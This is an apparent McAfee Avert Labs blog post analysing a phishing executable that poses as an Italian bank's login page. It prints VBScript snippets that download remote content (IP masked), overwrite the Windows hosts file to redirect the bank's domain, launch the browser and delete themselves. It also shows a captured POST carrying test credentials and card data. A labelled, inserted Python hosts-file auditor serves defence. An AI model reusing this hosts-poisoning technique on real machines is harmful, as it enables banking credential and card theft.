A few days ago McAfee Avert Labs came across yet another example of how effective and especially dangerous phishing can be. We received a sample in the form of an .exe file that when executed would start Internet Explorer and present the login page of a well-known Italian bank.
At first sight, for the inexperienced and security-unaware user, the Web site looked exactly like the real thing. There were no obvious signs of fraud, as “only” the user name and password to get into the banking page were requested. Once these initial credentials were entered, a second page requested a card number, the expiration date, and the CVV2/CVC2 number. After this, you guessed it, a simple message: “Wrong details, try again!”
What actually happened is that the sample creates the file finaltemp.vbs and runs it immediately via the Windows Script Interpreter, wscript.exe. The VBS script is immediately removed from the system. Here are some interesting snippets of the code embedded into the executable:
Set WshShell = WScript.CreateObject("WScript.Shell")
strURL = "http://x.x.x.x/twiki/b.txt"
Dim fso
Set fso = CreateObject("Scripting.FileSystemObject")
More code creates some objects used to write the contents of the file through HTTP requests using Microsoft.XmlHttp.
fileToCopy = fso.GetSpecialFolder(WindowsFolder).Path & "\system32\drivers\etc\hosts"
This will copy the content of b.txt, seen above, to the hosts file, leading to compromised name resolution!
WshShell.Run "iexplore.exe"
Set aFile = fso.GetFile(strOutFile)
aFile.Delete
This will run Internet Explorer, opening the main page of the bank with what looks like the correct address for the bank in the browser’s address bar; however, the name now resolves to the bad IP set in the modified hosts file. At this stage the unaware user enters his or her information on the page, which gets sent to a remote location that is certainly not the secure bank environment. All of this happens silently, without any popping cmd shells, ActiveX complaints from IE, or any other suspicious activity.
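A defender-side check for exactly this kind of tampering, added here as an example and not part of the original post or of any McAfee tooling: it parses a hosts file the way the resolver reads it and flags watchlisted hostnames pinned to any address, plus any hostname pinned to an address outside loopback and private ranges. The sample file, the watchlist and the 203.0.113.10 address (a documentation range, not the attacker's IP) are constructed for the example.

```python
import ipaddress

# Constructed sample of a Windows hosts file after tampering of the kind the post
# describes; 203.0.113.10 is a TEST-NET-3 address standing in for the bad server.
SAMPLE_HOSTS = """\
# Copyright (c) 1993-2009 Microsoft Corp.
127.0.0.1       localhost
::1             localhost
10.0.0.5        intranet.corp.example
203.0.113.10    poste.it www.poste.it
203.0.113.10    bancopostaonline.poste.it   # constructed entry
203.0.113.10    login.example               # constructed, not watchlisted
"""

# Hypothetical watchlist; a real one comes from the organisation's inventory
# of banking / SSO hostnames that must never be pinned in the hosts file.
WATCHLIST = {"poste.it", "www.poste.it", "bancopostaonline.poste.it"}

# Ranges a hosts file may legitimately carry: loopback, link-local, RFC 1918, ULA.
LOCAL_NETS = [ipaddress.ip_network(n) for n in (
    "127.0.0.0/8", "::1/128", "169.254.0.0/16", "fe80::/10",
    "10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "fc00::/7")]

def is_local(ip):
    return any(ip in net for net in LOCAL_NETS)

def parse_hosts(text):
    """Yield (line_no, address, [hostnames]) for every active mapping line."""
    for line_no, raw in enumerate(text.splitlines(), start=1):
        entry = raw.split("#", 1)[0].strip()      # strip comments and blanks
        fields = entry.split()
        if len(fields) >= 2:
            yield line_no, fields[0], fields[1:]

def audit_hosts(text, watchlist=WATCHLIST):
    """Return (line_no, address, hostname, reason) for each suspicious mapping."""
    findings = []
    for line_no, addr, names in parse_hosts(text):
        try:
            ip = ipaddress.ip_address(addr)
        except ValueError:
            findings.append((line_no, addr, " ".join(names), "unparseable address"))
            continue
        for name in (n.lower() for n in names):
            if name in watchlist:
                findings.append((line_no, addr, name, "watchlisted hostname pinned"))
            elif not is_local(ip):
                findings.append((line_no, addr, name, "pinned to non-local address"))
    return findings
```

On a real Windows host, feed it the contents of %SystemRoot%\System32\drivers\etc\hosts, the same path the VBS script writes to.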
If we look at a packet-sniffer trace, we can see the POST request made to the URL mentioned in the snippet above. It was registered through (no kidding!) Godaddy.com. We can also see all the requests made to the IP written to the hosts file by the VBS script, including a POST containing the username, password, card number with the security code, and expiry date. (In this case you can see that the Avert Labs account with password “testing” is now officially owned.)
POST /index.php?MfcISAPICommand=ProcessCC&UsingSSL=1&login=labs&pass=TESTING HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*
Referer: http://X.X.X.X/index.php?MfcISAPICommand=VerifyFPP&UsingSSL=1&login=&pass=
Accept-Language: en-us
Content-Type: application/x-www-form-urlencoded
UA-CPU: x86
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
Host: poste.it
Content-Length: 165
Connection: Keep-Alive
Cache-Control: no-cache

Session=cvv2.gif&password=TESTING&ccnumber=6666666666666666&month=10&year=10&cvv=666&__EVENTTARGET=RicaricaCartaPPayPagamentoPPayEdit1%3AbtnContinua&__EVENTARGUMENT=

HTTP/1.1 200 OK
Date: Fri, 14 Mar 2008 18:00:39 GMT
Server: Apache/2.2.3 (Debian) DAV/2 SVN/1.4.2 PHP/5.2.0-8
X-Powered-By: PHP/5.2.0-8
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html; charset=ISO-8859-1
It seems that phishing will remain a part of our daily lives. What is most alarming is the ease with which someone could change a few lines of the script to redirect the user to any site that requires authentication and grab very sensitive information, which could be used to steal money as well as any other type of information.
So far the Web site hosting the modifications required for the hosts file and the IP hosting the fake pages are still live and receiving data, so you can imagine how much could be gathered in just a few days or even a few hours. The reverse DNS details for the IP appear to be forged. We have contacted the owner of the IP and the bank itself to investigate further and have the fake site shut down as soon as possible.
The domains visit.geocities.com and geo.yahoo.com were involved as well, probably for tracking purposes.
Safe banking, folks!
Shoutout to Patrick!
Good to see you blogging for McAfee, keep up the great work — looking forward to your next blog.
Cheers,
Jay